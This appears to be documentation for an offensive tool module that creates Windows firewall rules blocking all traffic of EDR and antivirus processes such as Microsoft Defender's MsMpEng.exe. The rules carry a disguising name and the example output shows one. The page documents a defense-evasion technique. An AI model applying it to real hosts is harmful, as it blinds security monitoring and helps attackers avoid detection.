Description
Creates firewall rules blocking all traffic to and from known EDR/AV processes.
Overview
Employment Considerations
It seems that all events are cached locally, so once the firewall rules are removed, the events and alerts will start showing up in Microsoft Defender Security Center.
Parameters
| Name | Type | Description |
|---|---|---|
| NamePrefix | string | A name prefix for the rule. |
Example Output
Version : v2.28
Name : Core Services Protection Rule - MsMpEng
Description :
Enabled : True
ExecutablePath : C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25030.2-0\MsMpEng.exe
Protocol : Any
Direction : Both
Action : Block
LocalPorts : {}
RemotePorts : {}
LocalAddresses : {}
RemoteAddresses : {}